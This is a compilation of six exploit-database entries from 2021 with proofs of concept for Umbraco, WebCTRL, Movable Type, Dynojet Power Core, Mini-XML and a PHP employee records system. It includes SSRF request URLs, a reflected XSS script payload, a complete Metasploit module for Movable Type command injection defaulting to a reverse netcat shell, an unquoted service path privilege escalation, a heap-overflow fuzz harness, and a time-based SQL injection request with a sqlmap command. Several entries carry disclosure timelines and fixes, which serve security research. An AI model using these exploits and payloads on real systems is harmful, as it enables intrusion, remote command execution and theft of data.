# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF # Date: July 5, 2021 # Exploit Author: NgoAnhDuc # Vendor Homepage: https://our.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases/8141 # Version: v8.14.1 # Affect: Umbraco CMS v8.14.1, Umbraco Cloud Vulnerable code: Umbraco.Web.Editors.HelpController.GetContextHelpForPage(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14 Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50 Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91 PoC: /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl= https://SSRF-HOST.EXAMPLE/ /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/ Notes: - There's no "/" suffix in payload 1 - "/" suffix is required in payload 2 and payload 3 - "section" parameter value must be changed each exploit attempt

# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) # Date: 4/07/2021 # Exploit Author: 3ndG4me # Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/ # Version: 6.5 and Below # CVE : CVE-2021-31682 --Summary-- The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. Automated Logic https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ --Affects-- - WebCTRL OEM - Versions 6.5 and prior --Details-- The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to: - Hijacking a user's session - Using XSS payloads to capture input (keylogging) -- Proof of Concept -- The following URL parameter was impacted and can be exploited with the sample payload provided below: - https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script> --Mitigation-- Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript. --Timeline-- - 4/07/2021: XSS Vulnerability was discovered and documented. - 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication. - 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability. - 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product. - 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.

class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Movable Type XMLRPC API Remote Command Injection", 'Description' => %q{ This module exploit Movable Type XMLRPC API Remote Command Injection. }, 'License' => MSF_LICENSE, 'Author' => [ 'Etienne Gervais', # author & msf module, 'Charl-Alexandre Le Brun' # author & msf module ], 'References' => [ ['CVE', '2021-20837'], ['URL', 'https://movabletype.org/'], ['URL', 'https://nemesis.sh/'] ], 'DefaultOptions' => { 'SSL' => false, }, 'Platform' => ['linux'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'DisclosureDate' => "2021-10-20", 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ] ] )) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/']) ], self.class ) end def cmd_to_xml(cmd, opts={}) base64_cmd = Rex::Text.encode_base64("`"+cmd+"`") xml_body = <<~THISSTRING <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>mt.handler_to_coderef</methodName> <params> <param> <value> <base64> #{base64_cmd} </base64> </value> </param> </params> </methodCall> THISSTRING end def check begin fingerprint = Rex::Text.rand_text_alpha(32) command_payload = cmd_to_xml("echo "+fingerprint) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'), 'ctype' => 'text/xml; charset=UTF-8', 'data' => command_payload }) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200 if res && res.body.include?("Can't locate "+fingerprint) return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end Exploit::CheckCode::Safe end def exploit begin command_payload = cmd_to_xml(payload.raw) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'), 'ctype' => 'text/xml; charset=UTF-8', 'data' => command_payload }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end

# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path # Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R) # Version: 2.3.0 (Build 303) # Date: 30.10.2021 # Vendor Homepage: https://www.dynojet.com/ # Software Link: https://docs.dynojet.com/Document/18762 # Tested on: Windows 10 Version 21H1 (OS Build 19043.1320) SERVICE_NAME: DJ.UpdateService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DJ.UpdateService DEPENDENCIES : SERVICE_START_NAME : LocalSystem PS C:\Users\Developer> Get-UnquotedService ServiceName : DJ.UpdateService Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath> CanRestart : True Name : DJ.UpdateService ServiceName : DJ.UpdateService Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath> CanRestart : True Name : DJ.UpdateService #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.

# Exploit Title: Mini-XML 3.2 - Heap Overflow # Google Dork: mxml Mini-xml Mini-XML # Date: 2020.10.19 # Exploit Author: LIWEI # Vendor Homepage: https://www.msweet.org/mxml/ # Software Link: https://github.com/michaelrsweet/mxml # Version: v3.2 # Tested on: ubuntu 18.04.2 # 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link". # 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string. # 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow. # 4.- Here are the crash backtrace. ================================================================= ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98 READ of size 1 at 0x612000000a73 thread T0 #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13 #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20 #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11 #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8 #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357) #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea) #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0) #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2) #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529) # 6.- Here are my testcase. #include <string> #include <vector> #include <assert.h> #include "mxml.h" extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { std::string c(reinterpret_cast<const char *>(data), size); char *ptr; mxml_node_t *tree; tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK); if(tree){ ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK); if(!ptr) assert(false); mxmlDelete(tree); } return 0; }

# Title: Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated) # Exploit Author: Anubhav Singh # Date: 2021-10-31 # Vendor Homepage: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ # Version: 1.2 # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=8967 # Tested On: Windows 10, XAMPP # Vulnerable Parameter: Email Steps to Reproduce: 1) Navigate to http://localhost/employee_record/erms/forgetpassword.php and enter any email in email Field and capture request in burpsuite. 2) Create a txt file and paste this request. Request: ======= POST /employee_record/erms/forgetpassword.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 110 Origin: http://localhost Connection: close Referer: http://localhost/employee_record/erms/forgetpassword.php Cookie: security_level=0; PHPSESSID=7u3nsaok3or5a9199no8ion8fh Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 [email protected]&empid=ads'+AND+(SELECT+9312+FROM+(SELECT(SLEEP([SLEEPTIME])))MBeq)--+NIlX&submit=reset ----------------------------------------------------------------------------------------------------------------- 3) Send this request to sqlmap 4) command : python sqlmap.py -r request.txt -p Email --dbs 5) We can retrieve all databases using above sqlmap command